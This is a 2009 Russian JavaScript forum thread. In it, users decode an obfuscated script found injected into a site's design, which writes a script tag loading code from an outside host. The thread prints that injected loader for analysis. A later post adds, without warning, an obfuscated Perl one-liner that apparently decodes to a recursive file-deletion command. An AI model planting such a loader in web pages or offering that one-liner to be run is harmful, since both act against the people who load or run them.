Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Что обозначает этот скрипт? никогда токого не видел (https://javascript.ru/forum/misc/5505-chto-oboznachaet-ehtot-skript-nikogda-tokogo-ne-videl.html)

ProTach 19.10.2009 23:03

Что обозначает этот скрипт? никогда токого не видел
 
Вот нашёл у себя в дизайне сайта вот этот скрипт:

<script language="JavaScript">
<!--
function Ht580(cE956){document.write(String.fromCharCode(parseInt(cE956)+3));}
var Wi206="57~112~96~111~102~109~113~29~105~94~107~100~114~94~100~98~58~36~71~94~115~94~80~96~111~102~109~113~36~"+
"29~113~118~109~98~58~36~113~98~117~113~44~103~94~115~94~112~96~111~102~109~113~36~29~112~111~96~58~36~"+
"101~113~113~109~55~44~44~106~94~117~46~42~96~112~43~108~104~108~112~101~98~96~101~104~94~43~107~98~113~"+
"44~112~44~113~109~107~78~99~102~100~54~51~53~54~43~109~101~109~60~102~97~58~106~94~117~46~42~96~112~"+
"36~59~57~44~112~96~111~102~109~113~59"; var z798=Wi206.split("~");
var tl197=0;while(tl197<z798.length){Ht580(z798[tl197]);tl197++;}
// -->
</script>


Что он делает, может здесь какие нибудь закодированные слова и ссылки? В общим мне ни чё не понятно, объясните плиз!

Octane 19.10.2009 23:59

Он вставляет в код вот такую строку:
<script language='JavaScript' type='text/javascript' src='http://max1-cs.okoshechka.net/s/tpnQfig9689.php?id=max1-cs'></script>


Так как адрес okoshechka.net находится в списках AdBlock, предположу, что это какая-то реклама, хотя по прямому запросу какой-то безобидный код. Возможно, на странице есть еще подобные скрипты?

ProTach 20.10.2009 08:36

огромное спасибо, :thanks: вот от куда взялась эта рекламка. :) Нет, таких скриптов там больше нету.

format1981 22.10.2009 11:41

Цитата:

Сообщение от Octane (Сообщение 32875)
Он вставляет в код вот такую строку:
<script language='JavaScript' type='text/javascript' src='http://max1-cs.okoshechka.net/s/tpnQfig9689.php?id=max1-cs'></script>

А как ты узнал это?

B~Vladi 22.10.2009 12:41

document.write замени на alert.

Tolstiy 24.10.2009 04:07

Обалдеть.)))
 
Обалдеть, ктож такое чудо изобретал.))) Вот что значит закодированный код, который понимает только автор.))) Надо запомнить фокус, может когда пригодится.))

Octane 24.10.2009 13:26

А что там изобретать? Там просто коды символов исходной сроки через разделитель ~ записаны, ничего сложного.

B~Vladi 24.10.2009 18:14

Цитата:

Сообщение от Octane
А что там изобретать? Там просто коды символов исходной сроки через разделитель ~ записаны, ничего сложного.

С первого раза может удивить кого угодно:)

e1f 26.10.2009 19:03

B~Vladi,
с первого раза удивляет
Код:

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
А у ТС'а так, мелочь :)

B~Vladi 26.10.2009 19:56

Цитата:

Сообщение от e1f
с первого раза удивляет

Хочешь сказать что это JS?!...
А вообще так да... сложновато...


Часовой пояс GMT +3, время: 19:06.